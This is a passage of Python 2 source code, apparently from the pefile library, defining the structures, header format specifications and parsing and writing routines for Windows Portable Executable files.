elif name == 'name':
# Make sure we reset the entry in case the import had been set to import by ordinal
if self.name_offset:
name_rva = self.pe.get_rva_from_offset( self.name_offset )
self.pe.set_dword_at_offset( self.ordinal_offset, (0<<31) | name_rva )
# Complain if the length of the new name is longer than the existing one
if len(val) > len(self.name):
#raise Exception('The export name provided is longer than the existing one.')
pass
self.pe.set_bytes_at_offset( self.name_offset, val )
self.__dict__[name] = val
class ExportDirData(DataContainer):
"""Holds export directory information.
struct: IMAGE_EXPORT_DIRECTORY structure
symbols: list of exported symbols (ExportData instances)
"""
class ExportData(DataContainer):
"""Holds exported symbols' information.
ordinal: ordinal of the symbol
address: address of the symbol
name: name of the symbol (None if the symbol is
exported by ordinal only)
forwarder: if the symbol is forwarded it will
contain the name of the target symbol,
None otherwise.
"""
def __setattr__(self, name, val):
# If the instance doesn't yet have an ordinal attribute
# it's not fully initialized so can't do any of the
# following
#
if hasattr(self, 'ordinal') and hasattr(self, 'address') and hasattr(self, 'forwarder') and hasattr(self, 'name'):
if name == 'ordinal':
self.pe.set_word_at_offset( self.ordinal_offset, val )
elif name == 'address':
self.pe.set_dword_at_offset( self.address_offset, val )
elif name == 'name':
# Complain if the length of the new name is longer than the existing one
if len(val) > len(self.name):
#raise Exception('The export name provided is longer than the existing one.')
pass
self.pe.set_bytes_at_offset( self.name_offset, val )
elif name == 'forwarder':
# Complain if the length of the new name is longer than the existing one
if len(val) > len(self.forwarder):
#raise Exception('The forwarder name provided is longer than the existing one.')
pass
self.pe.set_bytes_at_offset( self.forwarder_offset, val )
self.__dict__[name] = val
class ResourceDirData(DataContainer):
"""Holds resource directory information.
struct: IMAGE_RESOURCE_DIRECTORY structure
entries: list of entries (ResourceDirEntryData instances)
"""
class ResourceDirEntryData(DataContainer):
"""Holds resource directory entry data.
struct: IMAGE_RESOURCE_DIRECTORY_ENTRY structure
name: If the resource is identified by name this
attribute will contain the name string. None
otherwise. If identified by id, the id is
available at 'struct.Id'
id: the id, also in struct.Id
directory: If this entry has a lower level directory
this attribute will point to the
ResourceDirData instance representing it.
data: If this entry has no further lower directories
and points to the actual resource data, this
attribute will reference the corresponding
ResourceDataEntryData instance.
(Either of the 'directory' or 'data' attribute will exist,
but not both.)
"""
class ResourceDataEntryData(DataContainer):
"""Holds resource data entry information.
struct: IMAGE_RESOURCE_DATA_ENTRY structure
lang: Primary language ID
sublang: Sublanguage ID
"""
class DebugData(DataContainer):
"""Holds debug information.
struct: IMAGE_DEBUG_DIRECTORY structure
"""
class BaseRelocationData(DataContainer):
"""Holds base relocation information.
struct: IMAGE_BASE_RELOCATION structure
entries: list of relocation data (RelocationData instances)
"""
class RelocationData(DataContainer):
"""Holds relocation information.
type: Type of relocation
The type string can be obtained by
RELOCATION_TYPE[type]
rva: RVA of the relocation
"""
def __setattr__(self, name, val):
# If the instance doesn't yet have a struct attribute
# it's not fully initialized so can't do any of the
# following
#
if hasattr(self, 'struct'):
# Get the word containing the type and data
#
word = self.struct.Data
if name == 'type':
word = (val << 12) | (word & 0xfff)
elif name == 'rva':
offset = val-self.base_rva
if offset < 0:
offset = 0
word = ( word & 0xf000) | ( offset & 0xfff)
# Store the modified data
#
self.struct.Data = word
self.__dict__[name] = val
class TlsData(DataContainer):
"""Holds TLS information.
struct: IMAGE_TLS_DIRECTORY structure
"""
class BoundImportDescData(DataContainer):
"""Holds bound import descriptor data.
This directory entry provides information on the
DLLs this PE file has been bound to (if bound at all).
The structure will contain the name and timestamp of the
DLL at the time of binding so that the loader can know
whether it differs from the one currently present in the
system and must, therefore, re-bind the PE's imports.
struct: IMAGE_BOUND_IMPORT_DESCRIPTOR structure
name: DLL name
entries: list of entries (BoundImportRefData instances)
the entries will exist if this DLL has forwarded
symbols. If so, the destination DLL will have an
entry in this list.
"""
class LoadConfigData(DataContainer):
"""Holds Load Config data.
struct: IMAGE_LOAD_CONFIG_DIRECTORY structure
name: dll name
"""
class BoundImportRefData(DataContainer):
"""Holds bound import forwarder reference data.
Contains the same information as the bound descriptor but
for forwarded DLLs, if any.
struct: IMAGE_BOUND_FORWARDER_REF structure
name: dll name
"""
# Valid FAT32 8.3 short filename characters according to:
# http://en.wikipedia.org/wiki/8.3_filename
# This will help decide whether DLL ASCII names are likely
# to be valid or otherwise corrupt data
#
# The filename length is not checked because the DLLs filename
# can be longer than the 8.3
allowed_filename = string.lowercase + string.uppercase + string.digits + "!#$%&'()-@^_`{}~+,.;=[]" + ''.join( [chr(i) for i in range(128, 256)] )
def is_valid_dos_filename(s):
if s is None or not isinstance(s, str):
return False
for c in s:
# Allow path separators as import names can contain directories.
if c not in allowed_filename and c not in '\\/':
return False
return True
# Check if an imported name uses the valid accepted characters expected in mangled
# function names. If the symbol's characters don't fall within this charset
# we will assume the name is invalid
#
allowed_function_name = string.lowercase + string.uppercase + string.digits + '_?@$()'
def is_valid_function_name(s):
if s is None or not isinstance(s, str):
return False
for c in s:
if c not in allowed_function_name:
return False
return True
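# Example (illustrative): is_valid_function_name('?Name@@YAXXZ') is True because
# every character is a letter, digit or one of '_?@$()', while a name containing
# a space or control character is rejected.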
class PE:
"""A Portable Executable representation.
This class provides access to most of the information in a PE file.
It expects to be supplied the name of the file to load or PE data
to process and an optional argument 'fast_load' (False by default)
which controls whether to load all the directory entries' information,
which can be quite time consuming.
pe = pefile.PE('module.dll')
pe = pefile.PE(name='module.dll')
would load 'module.dll' and process it. If the data is already
available in a buffer, the same can be achieved with:
pe = pefile.PE(data=module_dll_data)
The "fast_load" can be set to a default by setting its value in the
module itself by means, for instance, of a "pefile.fast_load = True".
That will make all subsequent instances skip loading the
whole PE structure. The "full_load" method can be used to parse
the missing data at a later stage.
Basic headers information will be available in the attributes:
DOS_HEADER
NT_HEADERS
FILE_HEADER
OPTIONAL_HEADER
All of them will contain among their attributes the members of the
corresponding structures as defined in WINNT.H
The raw data corresponding to the header (from the beginning of the
file up to the start of the first section) will be available in the
instance's attribute 'header' as a string.
The sections will be available as a list in the 'sections' attribute.
Each entry will contain as attributes all the structure's members.
Directory entries will be available as attributes (if they exist):
(no other entries are processed at this point)
DIRECTORY_ENTRY_IMPORT (list of ImportDescData instances)
DIRECTORY_ENTRY_EXPORT (ExportDirData instance)
DIRECTORY_ENTRY_RESOURCE (ResourceDirData instance)
DIRECTORY_ENTRY_DEBUG (list of DebugData instances)
DIRECTORY_ENTRY_BASERELOC (list of BaseRelocationData instances)
DIRECTORY_ENTRY_TLS
DIRECTORY_ENTRY_BOUND_IMPORT (list of BoundImportDescData instances)
The following dictionary attributes provide ways of mapping different
constants. They will accept the numeric value and return the string
representation and the opposite, feed in the string and get the
numeric constant:
DIRECTORY_ENTRY
IMAGE_CHARACTERISTICS
SECTION_CHARACTERISTICS
DEBUG_TYPE
SUBSYSTEM_TYPE
MACHINE_TYPE
RELOCATION_TYPE
RESOURCE_TYPE
LANG
SUBLANG
"""
#
# Format specifications for PE structures.
#
__IMAGE_DOS_HEADER_format__ = ('IMAGE_DOS_HEADER',
('H,e_magic', 'H,e_cblp', 'H,e_cp',
'H,e_crlc', 'H,e_cparhdr', 'H,e_minalloc',
'H,e_maxalloc', 'H,e_ss', 'H,e_sp', 'H,e_csum',
'H,e_ip', 'H,e_cs', 'H,e_lfarlc', 'H,e_ovno', '8s,e_res',
'H,e_oemid', 'H,e_oeminfo', '20s,e_res2',
'I,e_lfanew'))
__IMAGE_FILE_HEADER_format__ = ('IMAGE_FILE_HEADER',
('H,Machine', 'H,NumberOfSections',
'I,TimeDateStamp', 'I,PointerToSymbolTable',
'I,NumberOfSymbols', 'H,SizeOfOptionalHeader',
'H,Characteristics'))
__IMAGE_DATA_DIRECTORY_format__ = ('IMAGE_DATA_DIRECTORY',
('I,VirtualAddress', 'I,Size'))
__IMAGE_OPTIONAL_HEADER_format__ = ('IMAGE_OPTIONAL_HEADER',
('H,Magic', 'B,MajorLinkerVersion',
'B,MinorLinkerVersion', 'I,SizeOfCode',
'I,SizeOfInitializedData', 'I,SizeOfUninitializedData',
'I,AddressOfEntryPoint', 'I,BaseOfCode', 'I,BaseOfData',
'I,ImageBase', 'I,SectionAlignment', 'I,FileAlignment',
'H,MajorOperatingSystemVersion', 'H,MinorOperatingSystemVersion',
'H,MajorImageVersion', 'H,MinorImageVersion',
'H,MajorSubsystemVersion', 'H,MinorSubsystemVersion',
'I,Reserved1', 'I,SizeOfImage', 'I,SizeOfHeaders',
'I,CheckSum', 'H,Subsystem', 'H,DllCharacteristics',
'I,SizeOfStackReserve', 'I,SizeOfStackCommit',
'I,SizeOfHeapReserve', 'I,SizeOfHeapCommit',
'I,LoaderFlags', 'I,NumberOfRvaAndSizes' ))
__IMAGE_OPTIONAL_HEADER64_format__ = ('IMAGE_OPTIONAL_HEADER64',
('H,Magic', 'B,MajorLinkerVersion',
'B,MinorLinkerVersion', 'I,SizeOfCode',
'I,SizeOfInitializedData', 'I,SizeOfUninitializedData',
'I,AddressOfEntryPoint', 'I,BaseOfCode',
'Q,ImageBase', 'I,SectionAlignment', 'I,FileAlignment',
'H,MajorOperatingSystemVersion', 'H,MinorOperatingSystemVersion',
'H,MajorImageVersion', 'H,MinorImageVersion',
'H,MajorSubsystemVersion', 'H,MinorSubsystemVersion',
'I,Reserved1', 'I,SizeOfImage', 'I,SizeOfHeaders',
'I,CheckSum', 'H,Subsystem', 'H,DllCharacteristics',
'Q,SizeOfStackReserve', 'Q,SizeOfStackCommit',
'Q,SizeOfHeapReserve', 'Q,SizeOfHeapCommit',
'I,LoaderFlags', 'I,NumberOfRvaAndSizes' ))
__IMAGE_NT_HEADERS_format__ = ('IMAGE_NT_HEADERS', ('I,Signature',))
__IMAGE_SECTION_HEADER_format__ = ('IMAGE_SECTION_HEADER',
('8s,Name', 'I,Misc,Misc_PhysicalAddress,Misc_VirtualSize',
'I,VirtualAddress', 'I,SizeOfRawData', 'I,PointerToRawData',
'I,PointerToRelocations', 'I,PointerToLinenumbers',
'H,NumberOfRelocations', 'H,NumberOfLinenumbers',
'I,Characteristics'))
__IMAGE_DELAY_IMPORT_DESCRIPTOR_format__ = ('IMAGE_DELAY_IMPORT_DESCRIPTOR',
('I,grAttrs', 'I,szName', 'I,phmod', 'I,pIAT', 'I,pINT',
'I,pBoundIAT', 'I,pUnloadIAT', 'I,dwTimeStamp'))
__IMAGE_IMPORT_DESCRIPTOR_format__ = ('IMAGE_IMPORT_DESCRIPTOR',
('I,OriginalFirstThunk,Characteristics',
'I,TimeDateStamp', 'I,ForwarderChain', 'I,Name', 'I,FirstThunk'))
__IMAGE_EXPORT_DIRECTORY_format__ = ('IMAGE_EXPORT_DIRECTORY',
('I,Characteristics',
'I,TimeDateStamp', 'H,MajorVersion', 'H,MinorVersion', 'I,Name',
'I,Base', 'I,NumberOfFunctions', 'I,NumberOfNames',
'I,AddressOfFunctions', 'I,AddressOfNames', 'I,AddressOfNameOrdinals'))
__IMAGE_RESOURCE_DIRECTORY_format__ = ('IMAGE_RESOURCE_DIRECTORY',
('I,Characteristics',
'I,TimeDateStamp', 'H,MajorVersion', 'H,MinorVersion',
'H,NumberOfNamedEntries', 'H,NumberOfIdEntries'))
__IMAGE_RESOURCE_DIRECTORY_ENTRY_format__ = ('IMAGE_RESOURCE_DIRECTORY_ENTRY',
('I,Name',
'I,OffsetToData'))
__IMAGE_RESOURCE_DATA_ENTRY_format__ = ('IMAGE_RESOURCE_DATA_ENTRY',
('I,OffsetToData', 'I,Size', 'I,CodePage', 'I,Reserved'))
__VS_VERSIONINFO_format__ = ( 'VS_VERSIONINFO',
('H,Length', 'H,ValueLength', 'H,Type' ))
__VS_FIXEDFILEINFO_format__ = ( 'VS_FIXEDFILEINFO',
('I,Signature', 'I,StrucVersion', 'I,FileVersionMS', 'I,FileVersionLS',
'I,ProductVersionMS', 'I,ProductVersionLS', 'I,FileFlagsMask', 'I,FileFlags',
'I,FileOS', 'I,FileType', 'I,FileSubtype', 'I,FileDateMS', 'I,FileDateLS'))
__StringFileInfo_format__ = ( 'StringFileInfo',
('H,Length', 'H,ValueLength', 'H,Type' ))
__StringTable_format__ = ( 'StringTable',
('H,Length', 'H,ValueLength', 'H,Type' ))
__String_format__ = ( 'String',
('H,Length', 'H,ValueLength', 'H,Type' ))
__Var_format__ = ( 'Var', ('H,Length', 'H,ValueLength', 'H,Type' ))
__IMAGE_THUNK_DATA_format__ = ('IMAGE_THUNK_DATA',
('I,ForwarderString,Function,Ordinal,AddressOfData',))
__IMAGE_THUNK_DATA64_format__ = ('IMAGE_THUNK_DATA',
('Q,ForwarderString,Function,Ordinal,AddressOfData',))
__IMAGE_DEBUG_DIRECTORY_format__ = ('IMAGE_DEBUG_DIRECTORY',
('I,Characteristics', 'I,TimeDateStamp', 'H,MajorVersion',
'H,MinorVersion', 'I,Type', 'I,SizeOfData', 'I,AddressOfRawData',
'I,PointerToRawData'))
__IMAGE_BASE_RELOCATION_format__ = ('IMAGE_BASE_RELOCATION',
('I,VirtualAddress', 'I,SizeOfBlock') )
__IMAGE_BASE_RELOCATION_ENTRY_format__ = ('IMAGE_BASE_RELOCATION_ENTRY',
('H,Data',) )
__IMAGE_TLS_DIRECTORY_format__ = ('IMAGE_TLS_DIRECTORY',
('I,StartAddressOfRawData', 'I,EndAddressOfRawData',
'I,AddressOfIndex', 'I,AddressOfCallBacks',
'I,SizeOfZeroFill', 'I,Characteristics' ) )
__IMAGE_TLS_DIRECTORY64_format__ = ('IMAGE_TLS_DIRECTORY',
('Q,StartAddressOfRawData', 'Q,EndAddressOfRawData',
'Q,AddressOfIndex', 'Q,AddressOfCallBacks',
'I,SizeOfZeroFill', 'I,Characteristics' ) )
__IMAGE_LOAD_CONFIG_DIRECTORY_format__ = ('IMAGE_LOAD_CONFIG_DIRECTORY',
('I,Size',
'I,TimeDateStamp',
'H,MajorVersion',
'H,MinorVersion',
'I,GlobalFlagsClear',
'I,GlobalFlagsSet',
'I,CriticalSectionDefaultTimeout',
'I,DeCommitFreeBlockThreshold',
'I,DeCommitTotalFreeThreshold',
'I,LockPrefixTable',
'I,MaximumAllocationSize',
'I,VirtualMemoryThreshold',
'I,ProcessHeapFlags',
'I,ProcessAffinityMask',
'H,CSDVersion',
'H,Reserved1',
'I,EditList',
'I,SecurityCookie',
'I,SEHandlerTable',
'I,SEHandlerCount',
'I,GuardCFCheckFunctionPointer',
'I,Reserved2',
'I,GuardCFFunctionTable',
'I,GuardCFFunctionCount',
'I,GuardFlags' ) )
__IMAGE_LOAD_CONFIG_DIRECTORY64_format__ = ('IMAGE_LOAD_CONFIG_DIRECTORY',
('I,Size',
'I,TimeDateStamp',
'H,MajorVersion',
'H,MinorVersion',
'I,GlobalFlagsClear',
'I,GlobalFlagsSet',
'I,CriticalSectionDefaultTimeout',
'Q,DeCommitFreeBlockThreshold',
'Q,DeCommitTotalFreeThreshold',
'Q,LockPrefixTable',
'Q,MaximumAllocationSize',
'Q,VirtualMemoryThreshold',
'Q,ProcessAffinityMask',
'I,ProcessHeapFlags',
'H,CSDVersion',
'H,Reserved1',
'Q,EditList',
'Q,SecurityCookie',
'Q,SEHandlerTable',
'Q,SEHandlerCount',
'Q,GuardCFCheckFunctionPointer',
'Q,Reserved2',
'Q,GuardCFFunctionTable',
'Q,GuardCFFunctionCount',
'I,GuardFlags' ) )
__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__ = ('IMAGE_BOUND_IMPORT_DESCRIPTOR',
('I,TimeDateStamp', 'H,OffsetModuleName', 'H,NumberOfModuleForwarderRefs'))
__IMAGE_BOUND_FORWARDER_REF_format__ = ('IMAGE_BOUND_FORWARDER_REF',
('I,TimeDateStamp', 'H,OffsetModuleName', 'H,Reserved') )
def __init__(self, name=None, data=None, fast_load=None):
self.sections = []
self.__warnings = []
self.PE_TYPE = None
if not name and not data:
return
# This list will keep track of all the structures created.
# That will allow for an easy iteration through the list
# in order to save the modifications made
self.__structures__ = []
self.__from_file = None
if not fast_load:
fast_load = globals()['fast_load']
try:
self.__parse__(name, data, fast_load)
except:
self.close()
raise
def close(self):
if ( self.__from_file is True and hasattr(self, '__data__') and
((isinstance(mmap.mmap, type) and isinstance(self.__data__, mmap.mmap)) or
'mmap.mmap' in repr(type(self.__data__))) ):
self.__data__.close()
def __unpack_data__(self, format, data, file_offset):
"""Apply structure format to raw data.
Returns an unpacked structure object if successful, None otherwise.
"""
structure = Structure(format, file_offset=file_offset)
try:
structure.__unpack__(data)
except PEFormatError, err:
self.__warnings.append(
'Corrupt header "%s" at file offset %d. Exception: %s' % (
format[0], file_offset, str(err)) )
return None
self.__structures__.append(structure)
return structure
def __parse__(self, fname, data, fast_load):
"""Parse a Portable Executable file.
Loads a PE file, parsing all its structures and making them available
through the instance's attributes.
"""
if fname:
stat = os.stat(fname)
if stat.st_size == 0:
raise PEFormatError('The file is empty')
fd = None
try:
fd = file(fname, 'rb')
self.fileno = fd.fileno()
if hasattr(mmap, 'MAP_PRIVATE'):
# Unix
self.__data__ = mmap.mmap(self.fileno, 0, mmap.MAP_PRIVATE)
else:
# Windows
self.__data__ = mmap.mmap(self.fileno, 0, access=mmap.ACCESS_READ)
self.__from_file = True
except IOError, excp:
exception_msg = str(excp)
if exception_msg:
exception_msg = ': %s' % exception_msg
raise Exception('Unable to access file \'%s\'%s' % (fname, exception_msg))
finally:
if fd is not None:
fd.close()
elif data:
self.__data__ = data
self.__from_file = False
dos_header_data = self.__data__[:64]
if len(dos_header_data) != 64:
raise PEFormatError('Unable to read the DOS Header, possibly a truncated file.')
self.DOS_HEADER = self.__unpack_data__(
self.__IMAGE_DOS_HEADER_format__,
dos_header_data, file_offset=0)
# Guard against a missing DOS header before accessing e_magic
if not self.DOS_HEADER:
raise PEFormatError('DOS Header magic not found.')
if self.DOS_HEADER.e_magic == IMAGE_DOSZM_SIGNATURE:
raise PEFormatError('Probably a ZM Executable (not a PE file).')
if self.DOS_HEADER.e_magic != IMAGE_DOS_SIGNATURE:
raise PEFormatError('DOS Header magic not found.')
# OC Patch:
# Check for sane value in e_lfanew
#
if self.DOS_HEADER.e_lfanew > len(self.__data__):
raise PEFormatError('Invalid e_lfanew value, probably not a PE file')
nt_headers_offset = self.DOS_HEADER.e_lfanew
self.NT_HEADERS = self.__unpack_data__(
self.__IMAGE_NT_HEADERS_format__,
self.__data__[nt_headers_offset:nt_headers_offset+8],
file_offset = nt_headers_offset)
# We better check the signature right here, before the file screws
# around with sections:
# OC Patch:
# Some malware will cause the Signature value to not exist at all
if not self.NT_HEADERS or not self.NT_HEADERS.Signature:
raise PEFormatError('NT Headers not found.')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_NE_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a NE file')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_LE_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a LE file')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_LX_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a LX file')
if (0xFFFF & self.NT_HEADERS.Signature) == IMAGE_TE_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature. Probably a TE file')
if self.NT_HEADERS.Signature != IMAGE_NT_SIGNATURE:
raise PEFormatError('Invalid NT Headers signature.')
self.FILE_HEADER = self.__unpack_data__(
self.__IMAGE_FILE_HEADER_format__,
self.__data__[nt_headers_offset+4:nt_headers_offset+4+32],
file_offset = nt_headers_offset+4)
image_flags = retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
if not self.FILE_HEADER:
raise PEFormatError('File Header missing')
# Set the image's flags according to the Characteristics member
set_flags(self.FILE_HEADER, self.FILE_HEADER.Characteristics, image_flags)
optional_header_offset = \
nt_headers_offset+4+self.FILE_HEADER.sizeof()
# Note: location of sections can be controlled from PE header:
sections_offset = optional_header_offset + self.FILE_HEADER.SizeOfOptionalHeader
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER_format__,
# Read up to 256 bytes; copying more data than the structure needs is harmless
self.__data__[optional_header_offset:optional_header_offset+256],
file_offset = optional_header_offset)
# According to solardesigner's findings for his
# Tiny PE project, the optional header does not
# need fields beyond "Subsystem" in order to be
# loadable by the Windows loader (given that zeros
# are acceptable values and the header is loaded
# in a zeroed memory page)
# If trying to parse a full Optional Header fails
# we try to parse it again with some 0 padding
#
MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE = 69
if ( self.OPTIONAL_HEADER is None and
len(self.__data__[optional_header_offset:optional_header_offset+0x200])
>= MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE ):
# Add enough zeros to make up for the unused fields
#
padding_length = 128
# Create padding
#
padded_data = self.__data__[optional_header_offset:optional_header_offset+0x200] + (
'\0' * padding_length)
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER_format__,
padded_data,
file_offset = optional_header_offset)
# Check the Magic in the OPTIONAL_HEADER and set the PE file
# type accordingly
#
if self.OPTIONAL_HEADER is not None:
if self.OPTIONAL_HEADER.Magic == OPTIONAL_HEADER_MAGIC_PE:
self.PE_TYPE = OPTIONAL_HEADER_MAGIC_PE
elif self.OPTIONAL_HEADER.Magic == OPTIONAL_HEADER_MAGIC_PE_PLUS:
self.PE_TYPE = OPTIONAL_HEADER_MAGIC_PE_PLUS
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER64_format__,
self.__data__[optional_header_offset:optional_header_offset+0x200],
file_offset = optional_header_offset)
# Again, as explained above, we try to parse
# a reduced form of the Optional Header which
# is still valid despite not including all
# structure members
#
MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE = 69+4
if ( self.OPTIONAL_HEADER is None and
len(self.__data__[optional_header_offset:optional_header_offset+0x200])
>= MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE ):
padding_length = 128
padded_data = self.__data__[optional_header_offset:optional_header_offset+0x200] + (
'\0' * padding_length)
self.OPTIONAL_HEADER = self.__unpack_data__(
self.__IMAGE_OPTIONAL_HEADER64_format__,
padded_data,
file_offset = optional_header_offset)
if not self.FILE_HEADER:
raise PEFormatError('File Header missing')
# OC Patch:
# Die gracefully if there is no OPTIONAL_HEADER field
# 975440f5ad5e2e4a92c4d9a5f22f75c1
if self.PE_TYPE is None or self.OPTIONAL_HEADER is None:
raise PEFormatError("No Optional Header found, invalid PE32 or PE32+ file")
dll_characteristics_flags = retrieve_flags(DLL_CHARACTERISTICS, 'IMAGE_DLLCHARACTERISTICS_')
# Set the Dll Characteristics flags according to the DllCharacteristics member
set_flags(
self.OPTIONAL_HEADER,
self.OPTIONAL_HEADER.DllCharacteristics,
dll_characteristics_flags)
self.OPTIONAL_HEADER.DATA_DIRECTORY = []
#offset = (optional_header_offset + self.FILE_HEADER.SizeOfOptionalHeader)
offset = (optional_header_offset + self.OPTIONAL_HEADER.sizeof())
self.NT_HEADERS.FILE_HEADER = self.FILE_HEADER
self.NT_HEADERS.OPTIONAL_HEADER = self.OPTIONAL_HEADER
# Windows 8 specific check
#
if self.OPTIONAL_HEADER.AddressOfEntryPoint < self.OPTIONAL_HEADER.SizeOfHeaders:
self.__warnings.append(
'AddressOfEntryPoint is smaller than SizeOfHeaders: this file cannot run under Windows 8' )
# The NumberOfRvaAndSizes is sanitized to stay within
# reasonable limits so it can be cast to an int
#
if self.OPTIONAL_HEADER.NumberOfRvaAndSizes > 0x10:
self.__warnings.append(
'Suspicious NumberOfRvaAndSizes in the Optional Header. ' +
'Normal values are never larger than 0x10, the value is: 0x%x' %
self.OPTIONAL_HEADER.NumberOfRvaAndSizes )
MAX_ASSUMED_VALID_NUMBER_OF_RVA_AND_SIZES = 0x100
for i in xrange(int(0x7fffffffL & self.OPTIONAL_HEADER.NumberOfRvaAndSizes)):
if len(self.__data__) - offset == 0:
break
if len(self.__data__) - offset < 8:
data = self.__data__[offset:] + '\0'*8
else:
data = self.__data__[offset:offset+MAX_ASSUMED_VALID_NUMBER_OF_RVA_AND_SIZES]
dir_entry = self.__unpack_data__(
self.__IMAGE_DATA_DIRECTORY_format__,
data,
file_offset = offset)
if dir_entry is None:
break
# Would fail if missing an entry
# 1d4937b2fa4d84ad1bce0309857e70ca offending sample
try:
dir_entry.name = DIRECTORY_ENTRY[i]
except (KeyError, AttributeError):
break
offset += dir_entry.sizeof()
self.OPTIONAL_HEADER.DATA_DIRECTORY.append(dir_entry)
# If the offset goes outside the optional header,
# the loop is broken, regardless of how many directories
# NumberOfRvaAndSizes says there are
#
# We assume a normally sized optional header, hence we use
# sizeof() instead of reading SizeOfOptionalHeader.
# Then we add a default number of directories times their size,
# if we go beyond that, we assume the number of directories
# is wrong and stop processing
if offset >= (optional_header_offset +
self.OPTIONAL_HEADER.sizeof() + 8*16) :
break
offset = self.parse_sections(sections_offset)
# OC Patch:
# There could be a problem if there are no raw data sections
# greater than 0
# fc91013eb72529da005110a3403541b6 example
# Should this throw an exception if the minimum header offset
# can't be found?
#
rawDataPointers = [
self.adjust_FileAlignment( s.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment )
for s in self.sections if s.PointerToRawData>0 ]
if len(rawDataPointers) > 0:
lowest_section_offset = min(rawDataPointers)
else:
lowest_section_offset = None
if not lowest_section_offset or lowest_section_offset < offset:
self.header = self.__data__[:offset]
else:
self.header = self.__data__[:lowest_section_offset]
# Check whether the entry point lies within a section
#
if self.get_section_by_rva(self.OPTIONAL_HEADER.AddressOfEntryPoint) is not None:
# Check whether the entry point lies within the file
#
ep_offset = self.get_offset_from_rva(self.OPTIONAL_HEADER.AddressOfEntryPoint)
if ep_offset > len(self.__data__):
self.__warnings.append(
'Possibly corrupt file. AddressOfEntryPoint lies outside the file. ' +
'AddressOfEntryPoint: 0x%x' %
self.OPTIONAL_HEADER.AddressOfEntryPoint )
else:
self.__warnings.append(
'AddressOfEntryPoint lies outside the sections\' boundaries. ' +
'AddressOfEntryPoint: 0x%x' %
self.OPTIONAL_HEADER.AddressOfEntryPoint )
if not fast_load:
self.parse_data_directories()
class RichHeader:
pass
rich_header = self.parse_rich_header()
if rich_header:
self.RICH_HEADER = RichHeader()
self.RICH_HEADER.checksum = rich_header.get('checksum', None)
self.RICH_HEADER.values = rich_header.get('values', None)
else:
self.RICH_HEADER = None
def parse_rich_header(self):
"""Parses the rich header
see http://www.ntcore.com/files/richsign.htm for more information
Structure:
00 DanS ^ checksum, checksum, checksum, checksum
10 Symbol RVA ^ checksum, Symbol size ^ checksum...
...
XX Rich, checksum, 0, 0,...
"""
# Rich Header constants
#
DANS = 0x536E6144 # 'DanS' as dword
RICH = 0x68636952 # 'Rich' as dword
# Read a block of data
try:
rich_data = self.get_data(0x80, 0x80)
if len(rich_data) != 0x80:
return None
data = list(struct.unpack("<32I", rich_data))
except PEFormatError:
return None
# the checksum should be present 3 times after the DanS signature
#
checksum = data[1]
if (data[0] ^ checksum != DANS
or data[2] != checksum
or data[3] != checksum):
return None
result = {"checksum": checksum}
headervalues = []
result ["values"] = headervalues
data = data[4:]
for i in xrange(len(data) / 2):
# Stop once the Rich footer signature is found
#
if data[2 * i] == RICH:
# it should be followed by the checksum
#
if data[2 * i + 1] != checksum:
self.__warnings.append('Rich Header corrupted')
break
# header values come by pairs
#
headervalues += [data[2 * i] ^ checksum, data[2 * i + 1] ^ checksum]
return result
def get_warnings(self):
"""Return the list of warnings.
Non-critical problems found when parsing the PE file are
appended to a list of warnings. This method returns the
full list.
"""
return self.__warnings
def show_warnings(self):
"""Print the list of warnings.
Non-critical problems found when parsing the PE file are
appended to a list of warnings. This method prints the
full list to standard output.
"""
for warning in self.__warnings:
print '>', warning
def full_load(self):
"""Process the data directories.
This method will load the data directories which might not have
been loaded if the "fast_load" option was used.
"""
self.parse_data_directories()
def write(self, filename=None):
"""Write the PE file.
This function will process all headers and components
of the PE file and include all changes made (by just
assigning to attributes in the PE objects) and write
the changes back to a file whose name is provided as
an argument. The filename is optional, if not
provided the data will be returned as a 'str' object.
"""
if is_bytearray_available():
# Making a list of a byte file is incredibly inefficient and will
# cause pefile to take far more RAM than it should. Use bytearrays
# instead.
file_data = bytearray(self.__data__)
else:
file_data = list(self.__data__)
for structure in self.__structures__:
if is_bytearray_available():
struct_data = bytearray(structure.__pack__())
else:
struct_data = list(structure.__pack__())
offset = structure.get_file_offset()
file_data[offset:offset+len(struct_data)] = struct_data
if hasattr(self, 'VS_VERSIONINFO'):
if hasattr(self, 'FileInfo'):
for entry in self.FileInfo:
if hasattr(entry, 'StringTable'):
for st_entry in entry.StringTable:
for key, entry in st_entry.entries.items():
offsets = st_entry.entries_offsets[key]
lengths = st_entry.entries_lengths[key]
if is_bytearray_available():
if len( entry ) > lengths[1]:
l = bytearray()
for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [ ord(c) & 0xff, chr( (ord(c) & 0xff00) >> 8) ] )
else:
l.extend( [ ord(c), '\0' ] )
file_data[offsets[1]:offsets[1]+lengths[1]*2 ] = l
else:
l = bytearray()
for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [ chr(ord(c) & 0xff), chr( (ord(c) & 0xff00) >>8) ] )
else:
l.extend( [ ord(c), '\0'] )
file_data[offsets[1]:offsets[1]+len(entry)*2 ] = l
remainder = lengths[1] - len(entry)
if remainder:
start = offsets[1] + len(entry)*2
end = offsets[1] + lengths[1]*2
file_data[start:end] = ['\0'] * remainder*2
else:
if len( entry ) > lengths[1]:
l = list()
for idx, c in enumerate(entry):
if ord(c) > 256:
l.extend( [ chr(ord(c) & 0xff), chr( (ord(c) & 0xff00) >>8) ] )
else:
l.extend( [chr( ord(c) ), '\0'] )
file_data[
offsets[1] : offsets[1] + lengths[1]*2 ] = l
else:
l = list()
